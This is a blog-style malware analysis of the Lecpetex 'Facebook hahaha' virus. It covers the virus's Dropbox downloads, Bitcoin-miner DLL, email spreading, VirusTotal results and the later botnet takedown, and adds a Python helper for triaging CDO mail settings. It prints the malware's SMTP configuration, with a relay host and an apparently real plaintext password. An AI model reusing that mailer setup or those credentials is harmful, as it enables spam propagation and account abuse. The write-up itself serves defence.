[en] Virus Facebook hahaha (Lecpetex)


Some threads about a « Virus Facebook hahaha » these last days.
It seems some people got a private message with a zip file.



I don't have the main zip sent by Facebook, but someone sent me another zip related to this virus.
It's an interesting VBE script:

The VBE downloads some zip files from Dropbox and creates a Temp directory to store them.
It registers a DLL that is a Bitcoin miner: https://www.virustotal.com/fr/file/a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b/analysis/

SHA256: a775ad50757a3de35a3445fb6594cb4b5bc5ec4db34d63ec6b8bf852b6472d0b
File name: xml.exfffe
Detection ratio: 10 / 53
Analysis date: 2014-06-10 22:16:20 UTC (29 minutes ago)

Ad-Aware Gen:Variant.Graftor.143340 20140610
AntiVir TR/Dropper.Gen 20140610
Avast Win32:Miner-B [PUP] 20140610
BitDefender Gen:Variant.Graftor.143340 20140610
ESET-NOD32 a variant of Win32/Injector.BEIE 20140610
Emsisoft Gen:Variant.Graftor.143340 (B) 20140610
F-Secure Gen:Variant.Graftor.143340 20140610
GData Gen:Variant.Graftor.143340 20140610
MicroWorld-eScan Gen:Variant.Graftor.143340 20140610
Symantec Suspicious.AD 20140610

The VBE is also able to use external utilities like ClickYes (maybe modified: https://www.virustotal.com/fr/file/618232771f97ded754fe06e0be4f47b8c1b13ca9030ef01774176791f354447b/analysis/ ) to get the Outlook contact list and spread by email.
To do that, it uses a Greek SMTP server, configured through CDO fields:

' CDO configuration fields set by the script (fragment as found in the sample;
' the blog rendering shows the quotes as « », the script uses " )
.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2            ' 2 = send over the network via SMTP
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr"
.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
.Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False       ' no SSL/TLS
.Item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 60
.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1     ' 1 = basic authentication
.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "[email protected]"
.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "nat1978#"

Interesting!
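As an added example (not code from the post or from the malware), the Python helper below pulls the CDO configuration fields out of a decoded VBScript sample and lists what a responder would report about the mailer. The embedded script text is constructed; the account name and password in it are placeholders, only the relay and port values are those quoted above.

```python
import re

# Constructed sample of the CDO configuration block described in the post, as it
# looks in the decoded VBScript (the post shows it with « » quotes after rendering).
# The account name and password are placeholders, not the real ones.
SAMPLE_VBS = '''
With objMessage.Configuration.Fields
    .Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
    .Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "mailgate.otenet.gr"
    .Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 587
    .Item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = False
    .Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
    .Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "user@example.invalid"
    .Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "PLACEHOLDER"
End With
'''

# Matches ".Item(<q>http://schemas.microsoft.com/cdo/configuration/<field><q>) = <value>"
# and accepts both straight quotes and the « » substituted by the blog's rendering.
_CDO_FIELD = re.compile(
    r'\.Item\(\s*["«]\s*http://schemas\.microsoft\.com/cdo/configuration/(\w+)\s*["»]\s*\)'
    r'\s*=\s*(.+?)\s*$', re.MULTILINE)

def _parse_value(raw):
    """Turn a VBScript literal into a Python value (string, bool or int)."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] in '"«' and raw[-1] in '"»':
        return raw[1:-1].strip()
    if raw.lower() in ('true', 'false'):
        return raw.lower() == 'true'
    return int(raw) if raw.isdigit() else raw

def extract_cdo_config(script_text):
    """Return {field_name: value} for every CDO configuration field set in the script."""
    return {name: _parse_value(val) for name, val in _CDO_FIELD.findall(script_text)}

def triage(config):
    """Findings a responder would report for a CDO mailer found in a script sample."""
    findings = []
    if config.get('sendusing') == 2:  # cdoSendUsingPort: the script talks SMTP itself
        findings.append('direct SMTP delivery (sendusing=2), bypasses the local mail client')
    if 'smtpserver' in config:
        findings.append('hard-coded relay %s:%s' % (config['smtpserver'], config.get('smtpserverport', 25)))
    if config.get('smtpauthenticate') == 1 and 'sendpassword' in config:
        findings.append('hard-coded credentials for account %s' % config.get('sendusername', '?'))
        if config.get('smtpusessl') is False:
            findings.append('credentials sent without SSL/TLS (smtpusessl=False)')
    return findings
```

The relay host, port and account name are the values to block or watch for on the mail gateway; the same regex works on the raw text of the post itself.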

I will try to get the zip file sent on Facebook; if it is different, I will edit this thread.

EDIT – June 12

Facebook malicious spam example:

[Screenshots: Virus #1, Virus #2]

Also, someone sent me this article (in French): http://forum.security-x.fr/securite-generale/vague-de-spams-malicieux-sur-facebook/
There is a sample, but a bit old: first submission 2014-05-28 15:43:35 UTC (2 weeks ago) => https://www.virustotal.com/fr/file/4bcb865060ec401b2ed1d20422ed00488e04884f9abd573ca9d41d666b1fe7fc/analysis/1402529232/
The Jar tries to download a zip from Dropbox (maybe the same VBE script was there), but Dropbox has already removed everything.

It also seems that Malwarebytes has already blogged about it: http://blog.malwarebytes.org/security-threat/2014/03/malicious-messages-foray-facebook/


EDIT – June 23

Another article about this threat: http://thegoldenmessenger.blogspot.de/2014/06/malware-spread-over-facebook.html
According to the article, Microsoft detects the Jar under the name Java/Carastavona.E

EDIT – July 9 – Facebook takes down the Lecpetex botnet

Facebook takes down the Lecpetex botnet – more information: https://www.facebook.com/notes/protect-the-graph/taking-down-the-lecpetex-botnet/1477464749160338
